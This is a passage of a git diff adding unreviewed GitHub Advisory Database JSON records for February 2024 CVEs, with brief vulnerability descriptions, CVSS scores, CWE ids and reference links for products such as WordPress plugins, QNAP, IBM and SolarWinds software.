"https://nvd.nist.gov/vuln/detail/CVE-2023-51514" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/cbxwpbookmark/wordpress-cbx-bookmark-favorite-plugin-1-7-13-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T12:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json b/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json new file mode 100644 index 0000000000000..19edf212cef0e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g9v3-2ccp-qjx4/GHSA-g9v3-2ccp-qjx4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g9v3-2ccp-qjx4", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45027" + ], + "details": "A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to read the contents of unexpected files and expose sensitive data via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45027" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json b/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json new file mode 100644 index 0000000000000..cfd8eb9ba5e04 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g9xq-vwmw-hprm/GHSA-g9xq-vwmw-hprm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g9xq-vwmw-hprm", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33058" + ], + "details": "Information disclosure in Modem while processing SIB5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33058" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json b/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json new file mode 100644 index 0000000000000..8ee0e3087d31a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gc37-v9fg-72xc/GHSA-gc37-v9fg-72xc.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gc37-v9fg-72xc", + "modified": "2024-02-02T18:30:33Z", + "published": "2024-02-02T18:30:33Z", + "aliases": [ + "CVE-2024-1188" + ], + "details": "A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1188" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/14-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252678" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252678" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T18:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json b/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json new file mode 100644 index 0000000000000..a76464acfac7d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gccr-qg9r-6mhw", + "modified": "2024-02-04T03:30:23Z", + "published": "2024-02-04T03:30:23Z", + "aliases": [ + "CVE-2023-50947" + ], + "details": "IBM Business Automation Workflow 22.0.2, 23.0.1, and 23.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 275665.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50947" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275665" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114419" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114430" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T01:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json b/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json new file mode 100644 index 0000000000000..af1c343b6e9ea --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf24-7549-v36h", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0509" + ], + "details": "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0509" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json b/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json new file mode 100644 index 0000000000000..7a414be16c7fc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf96-mx4m-x82f", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2023-39611" + ], + "details": "An issue in Software FX Chart FX 7 version 7.0.4962.20829 allows attackers to enumerate and read files from the local filesystem by sending crafted web requests.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39611" + }, + { + "type": "WEB", + "url": "https://medium.com/%40arielbreisacher/my-chart-fx-7-software-investigation-journey-leading-to-a-directory-traversal-vulnerability-067cdcd3f2e9" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json b/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json new file mode 100644 index 0000000000000..f09b3c1535c41 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfhx-2xqr-982p", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24131" + ], + "details": "SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24131" + }, + { + "type": "WEB", + "url": "https://github.com/Hebing123/cve/issues/14" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json b/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json new file mode 100644 index 0000000000000..77032fb9fd13c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfj2-m63m-4q89", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1092" + ], + "details": "The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1092" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json b/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json new file mode 100644 index 0000000000000..b893b112d3030 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gg63-hgm5-v538", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-32327" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 254783.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32327" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254783" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json new file mode 100644 index 0000000000000..509eeb9286bba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gh68-jm46-84rf", + "modified": "2024-02-04T21:30:43Z", + "published": "2024-02-04T21:30:43Z", + "aliases": [ + "CVE-2023-52425" + ], + "details": "libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52425" + }, + { + "type": "WEB", + "url": "https://github.com/libexpat/libexpat/pull/789" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T20:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json b/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json new file mode 100644 index 0000000000000..23658496de905 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghjj-5h83-xf6v", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2023-6388" + ], + "details": "Suite CRM version 7.14.2 allows making arbitrary HTTP requests through\n\nthe vulnerable server. This is possible because the application is vulnerable\n\nto SSRF.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6388" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/leon/" + }, + { + "type": "WEB", + "url": "https://github.com/salesagility/SuiteCRM/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T03:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json b/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json new file mode 100644 index 0000000000000..b788e4f6ba609 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gj6f-cjc7-f9fg", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6700" + ], + "details": "The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6700" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028096/wp-gdpr-compliance/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42a4ef37-c842-4925-b06a-3e6423337567?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json b/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json new file mode 100644 index 0000000000000..4f61cc44c9209 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gj9j-vqjp-c845", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-01T21:30:31Z", + "aliases": [ + "CVE-2024-24041" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the location parameter at /travel-journal/write-journal.php.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24041" + }, + { + "type": "WEB", + "url": "https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md" + }, + { + "type": "WEB", + "url": "https://portswigger.net/web-security/cross-site-scripting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T20:50:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json new file mode 100644 index 0000000000000..ac97e8c1861e6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gm68-3cj6-qp9p", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-23196" + ], + "details": "A race condition was found in the Linux kernel's sound/hda device driver in snd_hdac_regmap_sync() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23196" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8148" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json new file mode 100644 index 0000000000000..c63344c2a9933 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp9c-7r9h-x95g", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-32328" + ], + "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. IBM X-Force Id: 254957.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32328" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254657" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json b/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json new file mode 100644 index 0000000000000..b7ad3ede4d0c9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq9v-6frh-4qfx", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45036" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45036" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json b/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json new file mode 100644 index 0000000000000..9cb83c292e89a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gqfw-9432-p6cq", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2023-50395" + ], + "details": "\nSQL Injection Remote Code Execution Vulnerability was found using an update statement in the SolarWinds Platform. This vulnerability requires user authentication to be exploited", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50395" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2024-1_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-50395" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json b/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json new file mode 100644 index 0000000000000..b18596f2ec979 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-grjc-q3pp-wg86", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20006" + ], + "details": "In da, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477148; Issue ID: ALPS08477148.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20006" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json b/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json new file mode 100644 index 0000000000000..440f00cc27fee --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-grjm-vqpg-p65p", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47566" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47566" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json b/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json new file mode 100644 index 0000000000000..d34d7ecb13971 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvhv-g3h5-f6r7", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20823" + ], + "details": "Implicit intent hijacking vulnerability in SamsungAccount of 